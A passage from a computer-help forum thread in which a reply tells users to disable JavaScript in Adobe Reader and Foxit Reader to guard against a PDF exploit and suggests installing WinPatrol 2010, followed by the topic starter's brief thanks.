Whether you use Adobe Reader, Acrobat or Foxit to read pdf files, you need to disable JavaScript in the program. There is an exploit out there now that can use it to get on your PC. For Adobe Reader: Start, All Programs, Adobe Reader, Edit, Preferences, click on JavaScript in the left column and uncheck Enable Acrobat JavaScript. OK. Close the program. It's the same for Foxit Reader except you uncheck Enable JavaScript Actions.

I recommend you install the free WinPatrol 2010 from http://www.winpatrol.com/download.html

It's a small program that will sit in your systray and warn you if something tries to make changes to your system.

#7
couber

    Member

  • Topic Starter
  • Member
  • PipPip
  • 29 posts
Thanks for replying. I will respond as soon as I try these, because I don't have much time these days. Thank you!!